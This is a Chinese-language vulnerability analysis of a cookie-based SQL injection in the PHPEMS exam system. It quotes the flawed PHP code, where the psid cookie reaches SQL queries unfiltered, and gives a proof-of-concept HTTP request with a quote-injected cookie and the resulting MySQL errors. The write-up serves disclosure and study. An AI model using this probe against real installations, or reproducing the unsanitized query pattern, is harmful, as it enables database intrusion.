phpems SQL注入(cookies)分析研究
PHPEMS(PHP Exam Management System)在线模拟考试系统基于PHP+Mysql开发,主要用于搭建模拟考试平台,支持多种题型和展现方式,是国内首款支持题冒题和自动评分与教师评分相结合的PHP开源在线模拟考试系统
使用本系统,您可以快速搭建用于模拟考试的网站平台,实现无纸化考试、真实考场模拟、知识强化练习等功能。可满足培训机构、学校、公司等机构各种考试需求。
<?php
public function __construct(&$G) {
$this->G = $G;
if (ini_get('magic_quotes_gpc')) {
$get = $this->stripSlashes($_REQUEST);
$post = $this->stripSlashes($_POST);
$this->cookie = $this->stripSlashes($_COOKIE);
} else {
$get = $_REQUEST;
$post = $_POST;
$this->cookie = $_COOKIE;
}
$this->file = $_FILES;
$this->get = $this->initData($get);
$this->post = $this->initData($post);
$this->url = $this->parseUrl();
} . . . . . . . . . .
//获取cookie
public function getCookie($par, $nohead = 0) {
if (isset($this->cookie[CH . $par])) return $this->cookie[CH . $par];
elseif (isset($this->cookie[$par]) && $nohead) return $this->cookie[$par];
else return false;
}
?>如果用户开启了GPC,程序员还特意使用stripSlashes()给关掉。
<?php
public function getSessionId() {
$sessionid = $this->ev->getCookie('psid');
if (!$sessionid) {
if ($this->ev->getCookie('PHPSESSID', 1)) {
$this->ev->setCookie('psid', $this->ev->getCookie('PHPSESSID', 1) , 3600 * 24);
$sessionid = $this->ev->getCookie('PHPSESSID', 1);
} else {
$sid = md5($this->ev->getClientIp() . '/' . $_SERVER['HTTP_X_FORWARDED_FOR'] . '/' . $_SERVER['REMOTE_ADDR'] . ':' . $_SERVER['REMOTE_PORT'] . ':' . $_SERVER['HTTP_USER_AGENT'] . ':' . date('Y-m-d'));
$this->ev->setCookie('psid', $sid, 3600 * 24);
$sessionid = $sid;
}
$data = array(
'session',
array(
'sessionid' => $sessionid,
'sessionuserid' => 0,
'sessionip' => $this->ev->getClientIp()
)
);
$sql = $this->sql->makeReplace($data);
$this->db->exec($sql);
}
$this->sessionid = $sessionid;
return $this->sessionid;
}
?>获得psid参数并起保存在$sessionid里
<?php
//修改考试会话内容
//参数:会话内容数组
//返回值:true
public function modifyExamSession($args) {
$sessionid = $this->session->getSessionId();
$data = array(
'examsession',
$args,
"examsessionid = '{$sessionid}'"
);
$sql = $this->sql->makeUpdate($data);
$this->db->exec($sql);
return true;
}
?>任意找了一个进入数据库的地方。
从上面过程看到,没有做任何过滤就进入数据库了。
Request: POST /index.php?exam-app-basics-openit HTTP/1.1 Host: phpems.0day5.com Proxy-Connection: keep-alive Content-Length: 79 Origin: http://phpems.0day5.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: http://phpems.0day5.com/index.php?exam-app-basics-detail&basicid=4 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 Cookie: exam_psid=c6f1b7acd452e6d72a3ede0f501a9211'; exam_currentuser=%25B4%2585 Response: HTTP/1.1 200 OK Date: Sun, 12 Jan 2014 09:32:14 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 X-Powered-By: PHP/5.4.22 P3P: CP=CAO PSA OUR Content-Length: 606 Content-Type: text/html; charset=utf-8 ERRO:SELECT * FROM x2_session AS session WHERE sessionid = 'c6f1b7acd452e6d72a3ede0f501a9211'' LIMIT 0,100:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''c6f1b7acd452e6d72a3ede0f501a9211'' LIMIT 0,100' at line 1ERRO:UPDATE x2_session AS session SET `sessionlasttime` = '1389519134' WHERE sessionid = 'c6f1b7acd452e6d72a3ede0f501a9211'':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''c6f1b7acd452e6d72a3ede0f501a9211''' at line 1
漏洞证明。
教程链接:http://www.phprm.com/code/60450.html
随意转载~但请保留教程地址★